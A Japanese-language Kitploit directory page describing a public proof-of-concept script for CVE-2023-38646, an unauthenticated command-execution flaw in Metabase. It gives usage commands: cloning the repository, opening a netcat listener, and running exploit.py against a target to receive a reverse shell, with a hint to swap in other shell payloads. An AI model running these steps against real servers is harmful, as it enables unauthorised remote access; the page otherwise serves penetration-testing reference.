Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-38646 — これは、オープンソースのビジネスインテリジェンスおよびデータ分析ツールであるMetabaseを悪用するための概念実証(PoC)スクリプトです。 | Kitploit
ツール/GitHubGitHub/threathntr/cve-2023-38646
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubthreathntr/cve-2023-38646

CVE-2023-38646

これは、オープンソースのビジネスインテリジェンスおよびデータ分析ツールであるMetabaseを悪用するための概念実証(PoC)スクリプトです。

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-38646 PoC

説明

これは、オープンソースのビジネスインテリジェンスおよびデータ分析ツールであるMetabaseを悪用するための概念実証(PoC)スクリプトです。Metabaseを使用すると、ユーザーはデータを可視化して操作できるため、データ分析のための強力なプラットフォームとなります。

CVE-2023-38646として指定されたこの脆弱性により、攻撃者は認証を必要とせずにサーバー上で任意のコマンドを実行できました。この欠陥の影響は深刻で、サーバーの権限レベルでサーバーへの不正アクセスが可能になりました。

概念実証(PoC)手順

リポジトリをクローンする

root@kitploit:~
git clone https://github.com/threatHNTR/CVE-2023-38646.git

リポジトリに移動する

root@kitploit:~
cd CVE-2023-38646

スクリプトを実行する前に、Netcatリスナーを設定する

root@kitploit:~
nc -nlvp chosen-port

スクリプトを実行する

root@kitploit:~
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port

悪用: スクリプトはターゲットのMetabaseサーバーにリバースシェルを送信しようとします。成功すると、マシン上でシェルを受け取ります。ペイロードを変更して、さまざまなリバースシェルを試すことができます。

参照

  • GitHubアドバイザリ: https://github.com/advisories/GHSA-jg32-8h6w-x7vg

  • Metabaseアドバイザリ: https://www.metabase.com/blog/security-advisory

  • Metabase GitHub: https://github.com/metabase/metabase

  • Assetnoteブログ - MetabaseにおけるPre-Auth RCEへの連鎖: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

ツールをダウンロード